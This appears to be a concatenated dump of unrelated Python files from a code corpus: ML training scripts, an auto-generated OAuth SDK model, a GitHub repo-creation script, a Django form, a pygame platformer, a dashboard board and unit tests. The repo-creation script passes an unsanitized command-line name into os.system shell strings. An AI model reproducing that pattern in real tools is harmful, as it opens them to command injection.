== y_test[index]:\n correct_predictions += 1\n else:\n incorrect_predictions +=1\n accuracy = 0\n accuracy = correct_predictions/(correct_predictions+incorrect_predictions)\n print(str(100*accuracy) + \"% accuracy\")\n if return_model:\n return accuracy, model\n else:\n return accuracy\n\nfrom sklearn.metrics import confusion_matrix\n\n\ndef run_model(batch_size=10, epochs=20, optimizer='adam'):\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # because this is running faster on just CPU\n os.environ['TF_CPP_MIN_LOG_LEVEL']='3'\n X, y = load_data()\n X_train_validate, X_test, y_train_validate, y_test = split_out_test_set(X, y, 4)\n X_train_validate, X_test = feature_scale(X_train_validate, X_test)\n\n accuracies = []\n for train, test in kfolding_for_cross_validation().split(X_train_validate, y_train_validate):\n model = None\n model = create_ANN_model(optimizer)\n accuracy = train_and_evaluate_model(model, X_train_validate[train], y_train_validate[train], X_train_validate[test], y_train_validate[test], 0, batch_size, epochs)\n accuracies.append(accuracy)\n standard_deviation = np.std(accuracies)\n # return np.mean(accuracies)\n\n\n model = None\n model = create_ANN_model(optimizer)\n trained_model_accuracy, trained_model = train_and_evaluate_model(model ,X_train_validate, y_train_validate, X_test, y_test, 1, batch_size, epochs)\n print(trained_model_accuracy)\n y_pred = trained_model.predict(X_test)\n y_pred = (y_pred > 0.5)\n cm = confusion_matrix(y_test, y_pred)\n\n\ndef grid_search():\n parameters = { 'batch_size': [1, 10, 24, 32, 50],\n 'epochs': [50, 200, 500],\n 'optimizer': ['adam', 'rmsprop'] }\n current_best_accuracy = 0\n current_best_parameter_set = ''\n for x in parameters['batch_size']:\n for y in parameters['epochs']:\n for z in parameters['optimizer']:\n new_accuracy = run_model(x, y, z)\n if new_accuracy > current_best_accuracy:\n current_best_accuracy = new_accuracy\n current_best_parameter_set = (str(x) + str(y) + z)\n print(current_best_accuracy)\n print(current_best_parameter_set)\n\n# output from grid search:\n# 0.8421207932176983\n# 32500adam\n\nif __name__ == \"__main__\":\n run_model(32, 500, 'adam')","sub_path":"part_1_ANNs/my_implementation/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"165133057","text":"# coding: utf-8\n\n\"\"\"\n Idfy.Admin\n\n In this API you can manage your account details, logo, styling or manage your openid / oauth api clients. If you are a dealer you can also manage the accounts registered to this dealer. ## Last update Last build date for this API: 14.01.2018 \n\n\"\"\"\n\n\nimport pprint\nimport re\nfrom typing import List, Dict\nfrom datetime import datetime as datetime\n\n\nfrom idfy_sdk.services.admin.models.oauth_secret import OauthSecret\n\nclass CreateOauthAPIClientRequest(object):\n \"\"\"NOTE: This class is generated by Eivind.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'account_id': str,\n 'client_name': str,\n 'client_secrets': List[OauthSecret],\n 'allowed_scopes': List[str],\n 'identity_token_lifetime': int,\n 'access_token_lifetime': int,\n 'absolute_refresh_token_lifetime': int,\n 'sliding_refresh_token_lifetime': int,\n 'refresh_token_usage': str,\n 'update_access_token_claims_on_refresh': bool,\n 'refresh_token_expiration': str,\n 'access_token_type': str,\n 'always_send_client_claims': bool,\n 'allowed_cors_origins': List[str]\n }\n\n attribute_map = {\n 'account_id': 'AccountId',\n 'client_name': 'ClientName',\n 'client_secrets': 'ClientSecrets',\n 'allowed_scopes': 'AllowedScopes',\n 'identity_token_lifetime': 'IdentityTokenLifetime',\n 'access_token_lifetime': 'AccessTokenLifetime',\n 'absolute_refresh_token_lifetime': 'AbsoluteRefreshTokenLifetime',\n 'sliding_refresh_token_lifetime': 'SlidingRefreshTokenLifetime',\n 'refresh_token_usage': 'RefreshTokenUsage',\n 'update_access_token_claims_on_refresh': 'UpdateAccessTokenClaimsOnRefresh',\n 'refresh_token_expiration': 'RefreshTokenExpiration',\n 'access_token_type': 'AccessTokenType',\n 'always_send_client_claims': 'AlwaysSendClientClaims',\n 'allowed_cors_origins': 'AllowedCorsOrigins'\n }\n\n def __init__(self, account_id=None, client_name=None, client_secrets=None, allowed_scopes=None, identity_token_lifetime=None, access_token_lifetime=None, absolute_refresh_token_lifetime=None, sliding_refresh_token_lifetime=None, refresh_token_usage=None, update_access_token_claims_on_refresh=None, refresh_token_expiration=None, access_token_type=None, always_send_client_claims=None, allowed_cors_origins=None):\n\n self._account_id = None\n self._client_name = None\n self._client_secrets = None\n self._allowed_scopes = None\n self._identity_token_lifetime = None\n self._access_token_lifetime = None\n self._absolute_refresh_token_lifetime = None\n self._sliding_refresh_token_lifetime = None\n self._refresh_token_usage = None\n self._update_access_token_claims_on_refresh = None\n self._refresh_token_expiration = None\n self._access_token_type = None\n self._always_send_client_claims = None\n self._allowed_cors_origins = None\n self.discriminator = None\n\n if account_id is not None:\n self.account_id = account_id\n if client_name is not None:\n self.client_name = client_name\n if client_secrets is not None:\n self.client_secrets = client_secrets\n if allowed_scopes is not None:\n self.allowed_scopes = allowed_scopes\n if identity_token_lifetime is not None:\n self.identity_token_lifetime = identity_token_lifetime\n if access_token_lifetime is not None:\n self.access_token_lifetime = access_token_lifetime\n if absolute_refresh_token_lifetime is not None:\n self.absolute_refresh_token_lifetime = absolute_refresh_token_lifetime\n if sliding_refresh_token_lifetime is not None:\n self.sliding_refresh_token_lifetime = sliding_refresh_token_lifetime\n if refresh_token_usage is not None:\n self.refresh_token_usage = refresh_token_usage\n if update_access_token_claims_on_refresh is not None:\n self.update_access_token_claims_on_refresh = update_access_token_claims_on_refresh\n if refresh_token_expiration is not None:\n self.refresh_token_expiration = refresh_token_expiration\n if access_token_type is not None:\n self.access_token_type = access_token_type\n if always_send_client_claims is not None:\n self.always_send_client_claims = always_send_client_claims\n if allowed_cors_origins is not None:\n self.allowed_cors_origins = allowed_cors_origins\n\n @property\n def account_id(self):\n \"\"\"Gets the account_id of this CreateOauthAPIClientRequest.\n\n\n :return: The account_id of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._account_id\n\n @account_id.setter\n def account_id(self, account_id):\n \"\"\"Sets the account_id of this CreateOauthAPIClientRequest.\n\n\n :param account_id: The account_id of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._account_id = account_id\n\n @property\n def client_name(self):\n \"\"\"Gets the client_name of this CreateOauthAPIClientRequest.\n\n\n :return: The client_name of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._client_name\n\n @client_name.setter\n def client_name(self, client_name):\n \"\"\"Sets the client_name of this CreateOauthAPIClientRequest.\n\n\n :param client_name: The client_name of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._client_name = client_name\n\n @property\n def client_secrets(self):\n \"\"\"Gets the client_secrets of this CreateOauthAPIClientRequest.\n\n\n :return: The client_secrets of this CreateOauthAPIClientRequest.\n :rtype: List[OauthSecret]\n \"\"\"\n return self._client_secrets\n\n @client_secrets.setter\n def client_secrets(self, client_secrets):\n \"\"\"Sets the client_secrets of this CreateOauthAPIClientRequest.\n\n\n :param client_secrets: The client_secrets of this CreateOauthAPIClientRequest.\n :type: List[OauthSecret]\n \"\"\"\n\n self._client_secrets = client_secrets\n\n @property\n def allowed_scopes(self):\n \"\"\"Gets the allowed_scopes of this CreateOauthAPIClientRequest.\n\n\n :return: The allowed_scopes of this CreateOauthAPIClientRequest.\n :rtype: List[str]\n \"\"\"\n return self._allowed_scopes\n\n @allowed_scopes.setter\n def allowed_scopes(self, allowed_scopes):\n \"\"\"Sets the allowed_scopes of this CreateOauthAPIClientRequest.\n\n\n :param allowed_scopes: The allowed_scopes of this CreateOauthAPIClientRequest.\n :type: List[str]\n \"\"\"\n\n self._allowed_scopes = allowed_scopes\n\n @property\n def identity_token_lifetime(self):\n \"\"\"Gets the identity_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of identity token in seconds (defaults to 300 seconds / 5 minutes)\n\n :return: The identity_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._identity_token_lifetime\n\n @identity_token_lifetime.setter\n def identity_token_lifetime(self, identity_token_lifetime):\n \"\"\"Sets the identity_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of identity token in seconds (defaults to 300 seconds / 5 minutes)\n\n :param identity_token_lifetime: The identity_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._identity_token_lifetime = identity_token_lifetime\n\n @property\n def access_token_lifetime(self):\n \"\"\"Gets the access_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of access token in seconds (defaults to 3600 seconds / 1 hour)\n\n :return: The access_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._access_token_lifetime\n\n @access_token_lifetime.setter\n def access_token_lifetime(self, access_token_lifetime):\n \"\"\"Sets the access_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of access token in seconds (defaults to 3600 seconds / 1 hour)\n\n :param access_token_lifetime: The access_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._access_token_lifetime = access_token_lifetime\n\n @property\n def absolute_refresh_token_lifetime(self):\n \"\"\"Gets the absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Maximum lifetime of a refresh token in seconds. Defaults to 2592000 seconds / 30 days\n\n :return: The absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._absolute_refresh_token_lifetime\n\n @absolute_refresh_token_lifetime.setter\n def absolute_refresh_token_lifetime(self, absolute_refresh_token_lifetime):\n \"\"\"Sets the absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Maximum lifetime of a refresh token in seconds. Defaults to 2592000 seconds / 30 days\n\n :param absolute_refresh_token_lifetime: The absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._absolute_refresh_token_lifetime = absolute_refresh_token_lifetime\n\n @property\n def sliding_refresh_token_lifetime(self):\n \"\"\"Gets the sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Sliding lifetime of a refresh token in seconds. Defaults to 1296000 seconds / 15 days\n\n :return: The sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._sliding_refresh_token_lifetime\n\n @sliding_refresh_token_lifetime.setter\n def sliding_refresh_token_lifetime(self, sliding_refresh_token_lifetime):\n \"\"\"Sets the sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Sliding lifetime of a refresh token in seconds. Defaults to 1296000 seconds / 15 days\n\n :param sliding_refresh_token_lifetime: The sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._sliding_refresh_token_lifetime = sliding_refresh_token_lifetime\n\n @property\n def refresh_token_usage(self):\n \"\"\"Gets the refresh_token_usage of this CreateOauthAPIClientRequest.\n\n\n :return: The refresh_token_usage of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._refresh_token_usage\n\n @refresh_token_usage.setter\n def refresh_token_usage(self, refresh_token_usage):\n \"\"\"Sets the refresh_token_usage of this CreateOauthAPIClientRequest.\n\n\n :param refresh_token_usage: The refresh_token_usage of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._refresh_token_usage = refresh_token_usage\n\n @property\n def update_access_token_claims_on_refresh(self):\n \"\"\"Gets the update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether the access token (and its claims) should be updated on a refresh token request.\n\n :return: The update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n :rtype: bool\n \"\"\"\n return self._update_access_token_claims_on_refresh\n\n @update_access_token_claims_on_refresh.setter\n def update_access_token_claims_on_refresh(self, update_access_token_claims_on_refresh):\n \"\"\"Sets the update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether the access token (and its claims) should be updated on a refresh token request.\n\n :param update_access_token_claims_on_refresh: The update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n :type: bool\n \"\"\"\n\n self._update_access_token_claims_on_refresh = update_access_token_claims_on_refresh\n\n @property\n def refresh_token_expiration(self):\n \"\"\"Gets the refresh_token_expiration of this CreateOauthAPIClientRequest.\n\n\n :return: The refresh_token_expiration of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._refresh_token_expiration\n\n @refresh_token_expiration.setter\n def refresh_token_expiration(self, refresh_token_expiration):\n \"\"\"Sets the refresh_token_expiration of this CreateOauthAPIClientRequest.\n\n\n :param refresh_token_expiration: The refresh_token_expiration of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._refresh_token_expiration = refresh_token_expiration\n\n @property\n def access_token_type(self):\n \"\"\"Gets the access_token_type of this CreateOauthAPIClientRequest.\n\n\n :return: The access_token_type of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._access_token_type\n\n @access_token_type.setter\n def access_token_type(self, access_token_type):\n \"\"\"Sets the access_token_type of this CreateOauthAPIClientRequest.\n\n\n :param access_token_type: The access_token_type of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._access_token_type = access_token_type\n\n @property\n def always_send_client_claims(self):\n \"\"\"Gets the always_send_client_claims of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether client claims should be always included in the access tokens - or only for client credentials flow.\n\n :return: The always_send_client_claims of this CreateOauthAPIClientRequest.\n :rtype: bool\n \"\"\"\n return self._always_send_client_claims\n\n @always_send_client_claims.setter\n def always_send_client_claims(self, always_send_client_claims):\n \"\"\"Sets the always_send_client_claims of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether client claims should be always included in the access tokens - or only for client credentials flow.\n\n :param always_send_client_claims: The always_send_client_claims of this CreateOauthAPIClientRequest.\n :type: bool\n \"\"\"\n\n self._always_send_client_claims = always_send_client_claims\n\n @property\n def allowed_cors_origins(self):\n \"\"\"Gets the allowed_cors_origins of this CreateOauthAPIClientRequest.\n\n\n :return: The allowed_cors_origins of this CreateOauthAPIClientRequest.\n :rtype: List[str]\n \"\"\"\n return self._allowed_cors_origins\n\n @allowed_cors_origins.setter\n def allowed_cors_origins(self, allowed_cors_origins):\n \"\"\"Sets the allowed_cors_origins of this CreateOauthAPIClientRequest.\n\n\n :param allowed_cors_origins: The allowed_cors_origins of this CreateOauthAPIClientRequest.\n :type: List[str]\n \"\"\"\n\n self._allowed_cors_origins = allowed_cors_origins\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in self.swagger_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CreateOauthAPIClientRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"idfy_sdk/services/admin/models/create_oauth_api_client_request.py","file_name":"create_oauth_api_client_request.py","file_ext":"py","file_size_in_byte":16779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44313453","text":"#!/usr/bin/env python3\nimport requests\nfrom pprint import pprint\nfrom secrets import GITHUB_TOKEN, REPO_PATH, GITHUB_USER\nimport argparse\nimport os\n\n#Parsing arguments -> Name of the repository, Visibility of the repository (Private/Public)\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", \"-n\", type=str, dest=\"name\", required=True)\nparser.add_argument(\"--private\", \"-p\", dest=\"is_private\", action=\"store_true\")\n\nargs = parser.parse_args()\n\nrepo_name = args.name\nis_private = args.is_private\n\n#Creating the repo based on received arguments\nAPI_URL = \"https://api.github.com\"\n#GITHUB_TOKEN = \n#REPO_PATH = \n#GITHUB_USER= \n\nif is_private:\n payload = '{\"name\":\"' + repo_name + '\", \"private\": true}'\nelse:\n payload = '{\"name\":\"' + repo_name + '\", \"private\": false}'\n\nheaders = {\n \"Authorization\" : \"token \" + GITHUB_TOKEN,\n \"Accept\": \"application/vnd.github.v3+json\"\n}\ntry:\n r = requests.post(API_URL+\"/user/repos\",data=payload,headers=headers)\n r.raise_for_status()\n #pprint(r.json())\nexcept requests.exceptions.RequestException as err:\n raise SystemExit(err)\n\n# Adding README to the Repo and creating a local clone + Linking local repo and remote repo.\ntry:\n os.chdir(REPO_PATH)\n os.system(\"mkdir \" + repo_name)\n os.chdir(REPO_PATH + repo_name)\n os.system(\"git init\")\n os.system(\"git remote add origin https://github.com/\" + GITHUB_USER + \"/\" + repo_name + \".git\")\n os.system(\"git branch -M main\")\n os.system(\"echo '# \" + repo_name + \"' >> README.md\")\n os.system(\"git add . && git commit -m 'Initial Commit' && git push origin main\")\nexcept FileExistsError as err:\n raise SystemExit(err)","sub_path":"createRepo.py","file_name":"createRepo.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96317333","text":"from django import forms\nfrom refrigerator.models import *\n\n\n#recipe_checkbox\nclass RecipeForm(forms.Form):\n def __init__(self, user, foods=[], *args, **kwargs):\n super(RecipeForm, self).__init__(*args,**kwargs)\n self.fields['foods'] = forms.MultipleChoiceField(\n label = \"\",\n choices = [(item.id,item.foodset) for item in foods],\n widget = forms.CheckboxSelectMultiple(),\n initial = 0\n )","sub_path":"syokuzai_tarou/recipe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106912517","text":"\"\"\"\nFlagship file for the StickyJump platformer game\nProprietary content of StickyAR, 2019\nBrought to you by Luke Igel, Fischer Moseley, Tim Gutterman, and Zach Rolfness\n\"\"\"\nimport pygame as pg\nimport time\nimport random\nfrom settings import *\nfrom stickys import updateSticky, clearSticky, calibrate, uncalibrate\n\nfrom sprites import *\nfrom time import sleep\n\n# Default data seeds a guaranteed game world in absence of CV data\nDEFAULT_CV = [(150,200,50,50,\"blue\"), (275,200,50,50,\"orange\"), (375,200,50,50,\"green\"), (450,200,50,50,\"pink\")]\n\nclass StickyJump:\n def __init__(self, cv_data, debug_mode):\n self.debug_mode = debug_mode\n # Check if CV data pipeline is operational, and use default data if not\n if cv_data is None:\n self.cv_data = DEFAULT_CV\n else:\n self.cv_data = cv_data\n # Add the invisible killing floor to bottom of game window\n self.cv_data.append((0, 768, 2048, 5,\"pink\"))\n \n # Initialize game window\n pg.init()\n pg.mixer.init()\n if debug_mode:\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n else:\n self.screen = pg.display.set_mode((WIDTH, HEIGHT),flags=pg.FULLSCREEN)\n pg.display.set_caption(TITLE)\n \n #Basic procedural game settings\n self.clock = pg.time.Clock()\n self.running = True\n self.xspawn = 0\n self.yspawn = 0\n self.win_state = False\n\n def read_cv_data(self):\n \"\"\"Reads incoming CV data from the projected visual field and adds colored platforms as game sprites\"\"\"\n print(self.cv_data)\n \n for sticky in self.cv_data:\n # Get the sticky note's (x, y) position, width, and height, respectively\n plat = sticky[:-1]\n print(\"PLAT\")\n print(*plat)\n\n sticky_color = sticky[-1]\n # Different types of platforms correspond to different sticky note colors\n if sticky_color == \"green\":\n p = WinSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n self.winplatform.add(p)\n \n elif sticky_color == \"blue\":\n p = WalkSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n \n # Orange sticky is the spawn platform; only expect one of these\n elif sticky_color == \"orange\":\n p = SpawnSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n self.spawnplatform.add(p)\n # Add spawn coords to overall StickyJump game settings\n self.xspawn = p.rect.x\n self.yspawn = p.rect.y\n \n elif sticky_color == \"pink\":\n # If it's a death sticky, it belongs to a group of platforms reserved for death stickies\n p = DieSticky(debug_mode=self.debug_mode,*plat)\n self.deathplatforms.add(p)\n \n self.all_sprites.add(p)\n \n def spawnplayer(self):\n \"\"\"Spawn in Player at spawn sticky\"\"\"\n self.player = Player(self, self.xspawn, self.yspawn)\n self.all_sprites.add(self.player)\n \n # Player begins stationary in x direction\n self.player.vel = vec(0, 0)\n self.player.acc = vec(0, 0)\n \n def win_condition(self):\n #Displays win screen and then starts new game\n self.message_display('You Win!')\n time.sleep(1.25)\n self.new()\n \n def new(self, resticky=False):\n \"\"\"Start a new game\"\"\"\n if resticky:\n print(\"attempting to resticky\")\n self.cv_data = updateSticky()\n print(self.cv_data)\n \n # Define groups and subgroups of platforms\n self.all_sprites = pg.sprite.Group()\n self.safeplatforms = pg.sprite.Group()\n self.spawnplatform = pg.sprite.GroupSingle()\n self.winplatform = pg.sprite.GroupSingle()\n self.deathplatforms = pg.sprite.Group()\n \n #Fill out groups of platforms using CV data\n self.read_cv_data()\n \n #Spawn player and enter master game loop\n self.spawnplayer()\n self.win_state = False\n self.run()\n\n def run(self):\n \"\"\"Master Game Loop\"\"\"\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n # Update player's position and handle collisions with platforms\n self.update()\n # Checks for keystrokes that alter player or game state\n self.events() \n # Redraws game in window accordingly\n self.draw() \n \n if not self.playing:\n pg.QUIT()\n\n def update(self):\n \"\"\"Game Loop - Update\"\"\"\n # Updates Player sprite directly, allowing for movement along x-axis and falling along y-axis\n self.all_sprites.update()\n\n if self.win_state:\n self.win_condition()\n \n # Handles when player falls and collides with different types of platforms\n if self.player.vel.y > 0:\n \n # Falling collision with safe (orange, blue, green) platform\n hits = pg.sprite.spritecollide(self.player, self.safeplatforms, False)\n if hits:\n # Kill player's velocity at point of collision\n self.player.pos.y = hits[0].rect.top\n self.player.vel.y = 0\n \n # Handles win sequence if player falls onto win (green) platform\n wins = pg.sprite.spritecollide(self.player, self.winplatform, False)\n if wins:\n self.win_state = True\n \n # If collision with death (pink) platform, kill player and then respawn\n dead = pg.sprite.spritecollide(self.player, self.deathplatforms, False) #Checks for collision with death platform\n if dead:\n self.player.kill()\n self.player.remove()\n sleep(0.5)\n self.spawnplayer()\n\n def events(self):\n \"\"\"Game Loop - Keystroke Events\"\"\"\n for event in pg.event.get():\n if event.type == pg.KEYDOWN:\n \n # Escape key exits game\n if event.key == pg.K_ESCAPE:\n if self.playing:\n self.playing = False\n self.running = False\n \n # Spacebar mapped to jump\n if event.key == pg.K_SPACE:\n self.player.jump()\n \n # 'U' key means resticky and start new game\n if event.key == pg.K_u:\n print(\"restickying\")\n self.resticky()\n \n def draw(self):\n \"\"\"Game Loop - Draw\"\"\"\n self.screen.fill(BLACK)\n self.all_sprites.draw(self.screen)\n # *after* drawing everything, flip the display\n pg.display.flip()\n \n def resticky(self):\n \"\"\" **WORK IN PROGRESS**\n Handles changes to sticky note layout and builds new game accordingly\n \"\"\"\n print(\"restickying!\")\n self.new(True)\n \n # Extraneous for now\n delay = 250 # 500ms = 0.5s\n \n current_time = pg.time.get_ticks()\n change_time = current_time + delay\n show = True\n \n def text_objects(self, text, font):\n \"\"\"Helper function for message_display\"\"\"\n textSurface = font.render(text, True, WHITE)\n return textSurface, textSurface.get_rect()\n \n def message_display(self, text):\n \"\"\"Displays message in center of game window\"\"\"\n largeText = pg.font.Font('freesansbold.ttf',115)\n TextSurf, TextRect = self.text_objects(text, largeText)\n TextRect.center = ((WIDTH/2),(HEIGHT/2))\n self.screen.blit(TextSurf, TextRect)\n pg.display.update()\n\n def show_start_screen(self):\n \"\"\"game splash/start screen\"\"\"\n pass\n\n def show_go_screen(self):\n \"\"\"game over/continue\"\"\"\n pass\n\n","sub_path":"StickyAR/StickyJump.py","file_name":"StickyJump.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448114845","text":"from asp import TextSequence\nimport math\n\nc_hash = session_state.get('container_hash')\n\nif c_hash is None:\n ui.header('Texts')\n form = ui.form(\"Search\")\n query = form.text_input(value=\"\")\n\ntexts = TextSequence.filter(f'c.hash==\"{c_hash}\"' if c_hash else query)\n\n\ndef flatten(dictionary, parent_key='', separator='.'):\n items = []\n for key, value in dictionary.items():\n new_key = parent_key + separator + key if parent_key else key\n if isinstance(value, dict):\n items.extend(flatten(value, new_key, separator=separator).items())\n else:\n items.append((new_key, value))\n return dict(items)\n\n\n@memoize\ndef merge_dicts(dict1, dict2):\n merged_dict = dict1.copy()\n merged_dict.update(dict2)\n return merged_dict\n\n\n@memoize\ndef get_table_data(data=[], keys=[], page_size=10, page_num=1):\n table_data = {}\n page_data = data[(page_num - 1) * page_size:page_num * page_size]\n\n def append(key, value):\n if key in table_data:\n table_data[key].append(f'{value}')\n else:\n table_data[key] = [f'{value}']\n\n for key in keys:\n for i, page_item in enumerate(page_data):\n flattened_item = flatten(page_item)\n item = merge_dicts(page_item, flattened_item)\n if key == 'data':\n value = ((page_num - 1) * page_size) + i\n append(key, value)\n elif key in item:\n value = item[key]\n append(key, value)\n\n return table_data\n\n\nif texts:\n row1, row2 = ui.rows(2)\n\n items_per_page = row1.select('Items per page', ('5', '10', '50', '100'))\n total_pages = math.ceil((len(texts) / int(items_per_page)))\n page_numbers = [str(i) for i in range(1, total_pages + 1)]\n page_num = row1.select('Page', page_numbers, index=0)\n\n table_data = get_table_data(\n data=texts,\n keys=['name', 'container.hash', 'context',\n 'format', 'range', 'data', 'step', 'index'],\n page_size=int(items_per_page),\n page_num=int(page_num)\n )\n\n row2.table(table_data, {\n 'container.hash': lambda val: ui.board_link('run.py', val, state={'container_hash': val}),\n 'data': lambda val: ui.texts([texts[int(val)]])\n })\nelse:\n text = ui.text('No texts found')\n","sub_path":"pkgs/aimstack/asp/boards/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267283115","text":"import unittest\nimport os\nfrom interview_prep.puzzles.analyze_text import analyze_text\n\n\nclass AnalyzeTextTests(unittest.TestCase):\n \"\"\"Tests for the ''analyze_text()'' function.\"\"\"\n\n def setUp(self):\n \"\"\"Fixture to create a file to test\"\"\"\n self.filename = 'analyze_text_file.txt'\n with open(self.filename, 'w') as f:\n f.write('We the People of the United States, in Order to form a more perfect Union, establish Justice, '\n 'insure domestic Tranquility, provide for the common defence, promote the general Welfare, '\n 'and secure the Blessings of Liberty to ourselves and our Posterity, do ordain and establish '\n 'this Constitution for the United States of America.\\n'\n 'Article. I.\\nArticle. I.\\n'\n 'All legislative Powers herein granted shall be vested in a Congress of the United States, '\n 'which shall consist of a Senate and House of Representatives.\\n'\n 'Section. 2.\\nThe House of Representatives shall be composed of Members chosen every second '\n 'Year by the People of the several States, and the Electors in each State shall have the '\n 'Qualifications requisite for Electors of the most numerous Branch of the State Legislature.')\n\n def tearDown(self):\n \"\"\"Fixture to delete test file\"\"\"\n try:\n os.remove(self.filename)\n except:\n pass\n\n def test_function_runs(self):\n analyze_text(self.filename)\n\n def test_line_numbers(self):\n self.assertEqual(6, analyze_text(self.filename)[0])\n\n def test_char_numbers(self):\n self.assertEqual(773, analyze_text(self.filename)[1])\n\n def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foo')\n\n def test_no_deletion(self):\n \"\"\"Check that function doesn't delete the input file\"\"\"\n analyze_text(self.filename)\n self.assertTrue(os.path.exists(self.filename))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"interview_prep/puzzles/analyze_text_tests.py","file_name":"analyze_text_tests.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595962574","text":"\"\"\"\nThis code is sourced from the repo https://github.com/pytorch/examples\n All credit goes to the original author\n\"\"\"\nfrom __future__ import print_function\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom enum import Enum\n\nclass Dataset(Enum):\n mnsit = 1\n fashion_mnist = 2\n\n\n# configuration parameters\nepochs=10\nbatch_size=128\ndata_dir='../data' #dir to download dataset\noutput_dir='/results/results-vae/' # output dir\ndata_set=Dataset.fashion_mnist\n\nclass VAE:\n def __init__(self,train_data,test_data):\n self.model=Model()\n self.train_data=train_data\n self.test_data=test_data\n # initialize optimizer\n # adam optimizer is used instead of adagrad for better convergence\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-3)\n\n # loss function defined as sum of KL divergence and reconstruction loss\n def loss_function(self,recon_x, x, mu, logvar):\n recon_loss = functional.binary_cross_entropy(recon_x, x.view(-1, 784), reduction='sum')\n kld = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return recon_loss + kld\n\n def train(self,epoch):\n self.model.train()\n train_loss = 0\n for batch_index, (data, _) in enumerate(train_data):\n self.optimizer.zero_grad()\n recon_batch, mu, logvar = 